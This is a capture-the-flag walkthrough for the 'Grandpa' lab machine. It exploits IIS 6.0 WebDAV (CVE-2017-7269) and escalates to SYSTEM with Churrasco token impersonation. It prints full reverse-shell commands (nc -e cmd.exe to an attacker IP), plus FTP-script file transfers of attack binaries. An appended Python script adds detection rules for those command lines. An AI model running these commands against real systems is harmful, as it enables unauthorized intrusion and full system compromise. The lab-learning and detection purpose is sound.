HTB: Walkthrough without Metasploit. ~[GRANDPA]
IIS 6.0 privilege escalation using impersonation
machine IP: 10.10.10.14
1. Scanning and Enumeration-
A basic Nmap scan gives the results below.
We can see that many HTTP methods are enabled, one of which is PUT, which could allow us to upload a shell.
Visiting the IP, we can see a default page.
To check for PUT upload vulnerabilities, we use DAVTest, which ships with Kali Linux:
davtest -url http://10.10.10.14
This fails: the PUT method is not able to upload the shell.
Use searchsploit to find an exploit for IIS:
root@kali:~# searchsploit IIS 6.0
We will use the Microsoft IIS 6.0 — WebDAV ‘ScStoragePathFromUrl’ Remote Buffer Overflow exploit (https://exploit-db.com/exploits/41738)
root@kali:~# searchsploit -m 41738
// the -m option copies the exploit into the current directory. Checking the CVE for this exploit gives CVE-2017-7269; searching Google for “CVE-2017-7269 exploit Github” leads to the exploit below, which we download.
root@kali:~# wget https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell
Rename the exploit:
root@kali:~# mv iis6\ reverse\ shell exploit.py
2. Gaining Initial Access-
Use Netcat to create a listener on port 1234:
root@kali:~# nc -nlvp 1234
Now run the exploit with Python:
root@kali:~/hackthebox/07-Grandpa# python exploit.py 10.10.10.14 80 10.10.14.7 1234
NOTE — (we got the shell; if the exploit is not working, simply try to reset the machine and try again…) — in my case resetting the machine helped
Here we got the shell, but we can't access any of the user directories, because we don't have the privileges.
3. Privilege escalation-
For Windows we mostly use Windows-Exploit-Suggester:
root@kali:~# python windows-exploit-suggester.py --database 2020-04-04-mssb.xls --systeminfo ~/hackthebox/07-Grandpa/systeminfo.txt
We get many candidate exploits. I tried all of them and failed, but as I already said I want to solve this without Metasploit, so if you want to try, you can download compiled binaries of all the exploits from here and give them a try: https://github.com/SecWiki/windows-kernel-exploits/
Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:
For more detail, you can check this blog: Link
Let's download the exploit binary and copy nc.exe into the same location:
root@kali:~/hackthebox/07-Grandpa# wget https://github.com/Re4son/Churrasco/blob/master/churrasco.exe?raw=true
Rename the binary:
mv churrasco.exe\?raw\=true churrasco.exe
root@kali:~/hackthebox/07-Grandpa# cp /usr/share/windows-resources/binaries/nc.exe .
Now we need to upload our binaries to the box. I tried with PowerShell, but it's not available there, so we will use FTP for the file transfer. First, start an FTP server on Kali using Python:
root@kali:~/hackthebox/07-Grandpa# python -m pyftpdlib -p 21
On the box, we need a directory where we can write files, so go to:
C:\>cd wmpub
C:\wmpub>echo open 10.10.14.7 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET churrasco.exe >> ftp.txt&echo bye>> ftp.txt
This creates the file ftp.txt containing the FTP commands to download churrasco.exe; now run it non-interactively with the script:
C:\wmpub>ftp -v -n -s:ftp.txt
C:\wmpub>echo open 10.10.14.7 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET nc.exe >> ftp.txt&echo bye>> ftp.txt
This creates the file ftp.txt containing the FTP commands to download nc.exe; run it the same way:
C:\wmpub>ftp -v -n -s:ftp.txt
checking the FTP server
And on the shell, we can see we got both binaries.
Create a listener on port 7777 for churrasco.exe to connect back to our host:
nc -nlvp 7777
And now execute the binary:
churrasco.exe -d "C:\wmpub\nc.exe 10.10.14.7 7777 -e cmd.exe"
Now check the listener: here we have SYSTEM access.
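A detection-side counterpart to the steps above, added here as an example and not part of the original writeup: it flags the command-line patterns used on the box (the echo-built FTP script, scripted ftp.exe, nc -e, churrasco -d) in constructed process-creation records. The record format (Sysmon Event ID 1 style image + command line) is an assumption.

```python
import re

# Detection example for the living-off-the-land steps in this writeup; the event
# format is an assumption (Sysmon Event ID 1 style process-creation records).
# Each rule: (name, pattern applied to the full command line).
RULES = [
    # ftp.exe driven by a script file (-s:) is how the binaries were pulled onto the box
    ("ftp_scripted_transfer", re.compile(r"\bftp(\.exe)?\b[^|&]*\s-s:", re.I)),
    # cmd.exe assembling that script with echo redirects ("echo open <ip> ... > ftp.txt")
    ("ftp_script_staging", re.compile(r"\becho\s+open\s+\d{1,3}(\.\d{1,3}){3}\b.*>\s*\S+", re.I)),
    # netcat told to hand cmd.exe to a remote listener (-e)
    ("nc_exec_shell", re.compile(r"\bnc(\.exe)?\b.*\s-e\s+\S*cmd(\.exe)?", re.I)),
    # the churrasco token-kidnapping binary with its -d (run command) switch
    ("churrasco_token_kidnap", re.compile(r"\bchurrasco(\.exe)?\b\s+-d\b", re.I)),
]
HIGH_SIGNAL = {"nc_exec_shell", "churrasco_token_kidnap"}

def match_rules(cmdline: str) -> list[str]:
    """Names of every rule whose pattern fires on one command line (in RULES order)."""
    return [name for name, pat in RULES if pat.search(cmdline)]

def severity(hits: list[str]) -> str:
    """Scripted ftp alone can be admin noise; nc -e or churrasco is not."""
    if not hits:
        return "none"
    if HIGH_SIGNAL & set(hits) or len(hits) > 1:
        return "high"
    return "medium"

def triage(events: list[dict]) -> list[dict]:
    """Annotate each process-creation record with its matched rules and severity."""
    out = []
    for ev in events:
        hits = match_rules(ev["cmdline"])
        out.append({**ev, "rules": hits, "severity": severity(hits)})
    return out

# Constructed sample records mirroring the commands typed on the box in this
# writeup, plus two benign ones; they are not captured telemetry.
SAMPLE_EVENTS = [
    {"image": "cmd.exe", "cmdline": "cmd.exe /c echo open 10.10.14.7 21> ftp.txt&echo USER anonymous >> ftp.txt&echo bin>> ftp.txt&echo GET churrasco.exe >> ftp.txt&echo bye>> ftp.txt"},
    {"image": "ftp.exe", "cmdline": "ftp -v -n -s:ftp.txt"},
    {"image": "churrasco.exe", "cmdline": 'churrasco.exe -d "C:\\wmpub\\nc.exe 10.10.14.7 7777 -e cmd.exe"'},
    {"image": "notepad.exe", "cmdline": "notepad.exe C:\\wmpub\\ftp.txt"},
    {"image": "ping.exe", "cmdline": "ping -n 4 10.10.14.7"},
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(f'{row["severity"]:<6} {row["rules"]} <- {row["cmdline"][:60]}')
```

Tune the ftp rules per environment, since legitimate scheduled jobs also drive ftp.exe with -s:.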
Thanks to Rana Khalil — Inspired by her Journey!
Thanks to MrNmap — for the blog of Windows Privilege Escalation via Token Kidnapping